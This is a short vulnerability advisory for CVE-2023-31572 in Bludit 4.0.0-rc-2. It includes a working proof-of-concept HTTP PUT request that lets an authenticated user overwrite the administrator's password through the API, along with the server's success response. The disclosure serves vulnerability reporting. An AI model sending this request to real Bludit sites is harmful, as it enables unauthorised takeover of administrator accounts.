Headline
CVE-2023-31572: CVE-nu11secur1ty/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2 at main · nu11secur1ty/CVE-nu11secur1ty
An issue in Bludit 4.0.0-rc-2 allows authenticated attackers to change the Administrator password and escalate privileges via a crafted request.
The already authenticated attacker can send a normal request to change his password and then he can use the same JSON object and the vulnerable API token KEY in the same request to change the admin account password. Then he can access the admin account and he can do very malicious stuff.
PUT /api/users/admin HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 138
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
content-type: application/json
Accept: */*
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/admin/edit-user/pwned
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
Connection: close
{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
HTTP/1.1 200 OK Host: 127.0.0.1:8000 Date: Tue, 11 Apr 2023 08:33:51 GMT Connection: close X-Powered-By: PHP/7.4.30 Access-Control-Allow-Origin: * Content-Type: application/json
{"status":"0","message":"User edited.","data":{"key":"admin"}}